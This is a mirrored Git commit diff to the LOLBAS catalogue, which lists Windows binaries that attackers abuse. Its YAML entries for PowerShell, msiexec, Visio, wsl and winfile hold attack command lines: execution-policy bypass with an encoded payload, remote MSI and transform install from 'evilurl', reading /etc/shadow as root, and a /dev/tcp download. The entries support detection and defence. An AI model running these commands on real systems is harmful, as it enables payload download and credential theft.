mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2025-01-27 22:10:20 +01:00
Merge branch 'LOLBAS-Project:master' into XBootMgrSleep
This commit is contained in:
commit
4fc93f5e5b
38
yml/HonorableMentions/PowerShell.yml
Normal file
38
yml/HonorableMentions/PowerShell.yml
Normal file
@ -0,0 +1,38 @@
|
||||
---
|
||||
Name: Powershell.exe
|
||||
Description: Powershell.exe is a a task-based command-line shell built on .NET.
|
||||
Author: 'Everyone'
|
||||
Created: 2024-04-03
|
||||
Commands:
|
||||
- Command: powershell.exe -ep bypass -file c:\path\to\a\script.ps1
|
||||
Description: Set the execution policy to bypass and execute a PowerShell script without warning
|
||||
Usecase: Execute PowerShell cmdlets, .NET code, and just about anything else your heart desires
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1059.001
|
||||
OperatingSystem: Windows 7 and up
|
||||
- Command: powershell.exe -ep bypass -command "Invoke-AllTheThings..."
|
||||
Description: Set the execution policy to bypass and execute a PowerShell command
|
||||
Usecase: Execute PowerShell cmdlets, .NET code, and just about anything else your heart desires
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1059.001
|
||||
OperatingSystem: Windows 7 and up
|
||||
- Command: powershell.exe -ep bypass -ec IgBXAGUAIAA8ADMAIABMAE8ATABCAEEAUwAiAA==
|
||||
Description: Set the execution policy to bypass and execute a very malicious PowerShell encoded command
|
||||
Usecase: Execute PowerShell cmdlets, .NET code, and just about anything else your heart desires
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1059.001
|
||||
OperatingSystem: Windows 7 and up
|
||||
Full_Path:
|
||||
- Path: '%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe'
|
||||
- Path: '%SystemRoot%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe'
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/tree/71ae004b32bb3c7fb04714f8a051fc8e5edda68c/rules/windows/powershell
|
||||
Resources:
|
||||
- Link: https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_powershell_exe?view=powershell-5.1
|
||||
- Link: https://attack.mitre.org/techniques/T1059/001/
|
||||
Acknowledgement:
|
||||
- Person: Everyone
|
||||
Handle: '@alltheoffensivecyberers'
|
@ -1,18 +1,18 @@
|
||||
---
|
||||
Name: Csc.exe
|
||||
Description: Binary file used by .NET to compile C# code
|
||||
Description: Binary file used by .NET Framework to compile C# code
|
||||
Author: 'Oddvar Moe'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: csc.exe -out:My.exe File.cs
|
||||
Description: Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to My.exe.
|
||||
- Command: csc.exe -out:Output.exe File.cs
|
||||
Description: Use csc.exe to compile C# code, targeting the .NET Framework, stored in File.cs and output the compiled version to Output.exe.
|
||||
Usecase: Compile attacker code on system. Bypass defensive counter measures.
|
||||
Category: Compile
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: csc -target:library File.cs
|
||||
Description: Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to a dll file.
|
||||
Description: Use csc.exe to compile C# code, targeting the .NET Framework, stored in File.cs and output the compiled version to a DLL file.
|
||||
Usecase: Compile attacker code on system. Bypass defensive counter measures.
|
||||
Category: Compile
|
||||
Privileges: User
|
||||
@ -30,7 +30,4 @@ Detection:
|
||||
- Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml
|
||||
- IOC: Csc.exe should normally not run as System account unless it is used for development.
|
||||
Resources:
|
||||
- Link: https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe
|
||||
Acknowledgement:
|
||||
- Person:
|
||||
Handle:
|
||||
- Link: https://learn.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/
|
||||
|
@ -19,7 +19,7 @@ Commands:
|
||||
MitreID: T1218.007
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: msiexec /y "C:\folder\evil.dll"
|
||||
Description: Calls DLLRegisterServer to register the target DLL.
|
||||
Description: Calls DllRegisterServer to register the target DLL.
|
||||
Usecase: Execute dll files
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
@ -28,7 +28,7 @@ Commands:
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
- Command: msiexec /z "C:\folder\evil.dll"
|
||||
Description: Calls DLLUnregisterServer to un-register the target DLL.
|
||||
Description: Calls DllUnregisterServer to un-register the target DLL.
|
||||
Usecase: Execute dll files
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
@ -37,12 +37,12 @@ Commands:
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
- Command: msiexec /i "https://trustedURL/signed.msi" TRANSFORMS="https://evilurl/evil.mst" /qb
|
||||
Description: Installs the target .MSI file from a remote URL, the file can be signed by vendor. Additional to the file a Transformfile will be used, which can contains malicious code or binaries. The /qb will skip user input.
|
||||
Usecase: Install trusted and signed msi file, with additional attack code as Treansorm file, from remote server
|
||||
Description: Installs the target .MSI file from a remote URL, the file can be signed by vendor. Additional to the file a transformation file will be used, which can contains malicious code or binaries. The /qb will skip user input.
|
||||
Usecase: Install trusted and signed msi file, with additional attack code as transformation file, from a remote server
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218.007
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\msiexec.exe
|
||||
- Path: C:\Windows\SysWOW64\msiexec.exe
|
||||
|
@ -8,7 +8,7 @@ Commands:
|
||||
Description: 'Downloads a file from the web address specified in manifest.yml and executes it on the system. Local manifest setting must be enabled in winget for it to work: "winget settings --enable LocalManifestFiles"'
|
||||
Usecase: Download and execute an arbitrary file from the internet
|
||||
Category: Execute
|
||||
Privileges: Local Aministrator - required to enabled local manifest setting
|
||||
Privileges: Local Administrator - required to enable local manifest setting
|
||||
MitreID: T1105
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Full_Path:
|
||||
|
34
yml/OtherMSBinaries/Visio.yml
Normal file
34
yml/OtherMSBinaries/Visio.yml
Normal file
@ -0,0 +1,34 @@
|
||||
---
|
||||
Name: Visio.exe
|
||||
Description: Microsoft Visio Executable
|
||||
Author: Avihay Eldad
|
||||
Created: 2024-02-15
|
||||
Commands:
|
||||
- Command: Visio.exe https://example.com/payload
|
||||
Description: Downloads payload from remote server
|
||||
Usecase: It will download a remote payload and place it in INetCache.
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Download: INetCache
|
||||
Full_Path:
|
||||
- Path: C:\Program Files (x86)\Microsoft Office\Office14\Visio.exe
|
||||
- Path: C:\Program Files\Microsoft Office\Office14\Visio.exe
|
||||
- Path: C:\Program Files (x86)\Microsoft Office\Office15\Visio.exe
|
||||
- Path: C:\Program Files\Microsoft Office\Office15\Visio.exe
|
||||
- Path: C:\Program Files (x86)\Microsoft Office\Office16\Visio.exe
|
||||
- Path: C:\Program Files\Microsoft Office\Office16\Visio.exe
|
||||
- Path: C:\Program Files (x86)\Microsoft Office\root\Office14\Visio.exe
|
||||
- Path: C:\Program Files\Microsoft Office\root\Office14\Visio.exe
|
||||
- Path: C:\Program Files (x86)\Microsoft Office\root\Office15\Visio.exe
|
||||
- Path: C:\Program Files\Microsoft Office\root\Office15\Visio.exe
|
||||
- Path: C:\Program Files (x86)\Microsoft Office\root\Office16\Visio.exe
|
||||
- Path: C:\Program Files\Microsoft Office\root\Office16\Visio.exe
|
||||
Detection:
|
||||
- IOC: URL on a visio.exe command line
|
||||
- IOC: visio.exe making unexpected network connections or DNS requests
|
||||
Acknowledgement:
|
||||
- Person: Avihay Eldad
|
||||
Handle: '@AvihayEldad'
|
@ -10,35 +10,28 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1202
|
||||
OperatingSystem: Windows 10, Windows 19 Server
|
||||
OperatingSystem: Windows 10, Windows Server 2019, Windows 11
|
||||
- Command: wsl.exe -u root -e cat /etc/shadow
|
||||
Description: Cats /etc/shadow file as root
|
||||
Usecase: Performs execution of arbitrary Linux commands as root without need for password.
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1202
|
||||
OperatingSystem: Windows 10, Windows 19 Server
|
||||
- Command: wsl.exe --exec bash -c 'cat file'
|
||||
Description: Cats /etc/shadow file as root
|
||||
OperatingSystem: Windows 10, Windows Server 2019, Windows 11
|
||||
- Command: wsl.exe --exec bash -c "<command>"
|
||||
Description: Executes Linux command (for example via bash) as the default user (unless stated otherwise using `-u <username>`) on the default WSL distro (unless stated otherwise using `-d <distro name>`)
|
||||
Usecase: Performs execution of arbitrary Linux commands.
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1202
|
||||
OperatingSystem: Windows 10, Windows 19 Server
|
||||
- Command: wsl.exe --system calc.exe
|
||||
Description: Execute the command as root
|
||||
Usecase: Performs execution of arbitrary Linux commands as root without need for password.
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1202
|
||||
OperatingSystem: Windows 11
|
||||
OperatingSystem: Windows 10, Windows Server 2019, Windows 11
|
||||
- Command: wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'
|
||||
Description: Downloads file from 192.168.1.10
|
||||
Usecase: Download file
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1202
|
||||
OperatingSystem: Windows 10, Windows 19 Server
|
||||
MitreID: T1105
|
||||
OperatingSystem: Windows 10, Windows Server 2019, Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\wsl.exe
|
||||
Code_Sample:
|
||||
@ -59,3 +52,4 @@ Acknowledgement:
|
||||
Handle: '@d1r4c'
|
||||
- Person: Nasreddine Bencherchali
|
||||
Handle: '@nas_bench'
|
||||
- Person: Konrad 'unrooted' Klawikowski
|
||||
|
24
yml/OtherMSBinaries/winfile.yml
Normal file
24
yml/OtherMSBinaries/winfile.yml
Normal file
@ -0,0 +1,24 @@
|
||||
---
|
||||
Name: winfile.exe
|
||||
Description: Windows File Manager executable
|
||||
Author: Avihay Eldad
|
||||
Created: 2024-04-30
|
||||
Commands:
|
||||
- Command: winfile.exe calc.exe
|
||||
Description: Execute an executable file with WinFile as a parent process.
|
||||
Usecase: Performs execution of specified file, can be used as a defense evasion
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1202
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\winfile.exe
|
||||
- Path: C:\Windows\winfile.exe
|
||||
- Path: C:\Program Files\WinFile\winfile.exe
|
||||
- Path: C:\Program Files (x86)\WinFile\winfile.exe
|
||||
- Path: C:\Program Files\WindowsApps\Microsoft.WindowsFileManager_10.3.0.0_x64__8wekyb3d8bbwe\WinFile\winfile.exe
|
||||
Resources:
|
||||
- Link: https://github.com/microsoft/winfile
|
||||
Acknowledgement:
|
||||
- Person: Avihay Eldad
|
||||
Handle: '@AvihayEldad'
|
Loading…
Reference in New Issue
Block a user